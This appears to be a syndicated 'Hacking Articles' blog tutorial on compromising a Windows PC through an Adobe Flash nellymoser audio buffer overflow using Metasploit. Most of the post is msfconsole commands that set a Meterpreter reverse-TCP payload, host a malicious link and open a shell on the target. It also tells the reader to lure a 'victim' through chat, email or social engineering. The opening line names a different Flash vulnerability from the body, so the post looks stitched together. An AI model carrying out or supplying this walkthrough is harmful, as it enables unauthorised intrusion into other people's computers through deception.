The post Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption appeared first on Hacking Articles.

This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043

Exploit Targets

Windows 7

Windows 8

Firefox 38.0.5

Adobe Flash 18.0.0.160

Adobe Flash 11.2.202.466

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_nellymoser_bof

msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125

msf exploit (adobe_flash_nellymoser_bof)>set uripath /

msf exploit (adobe_flash_nellymoser_bof)>exploit

Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow appeared first on Hacking Articles.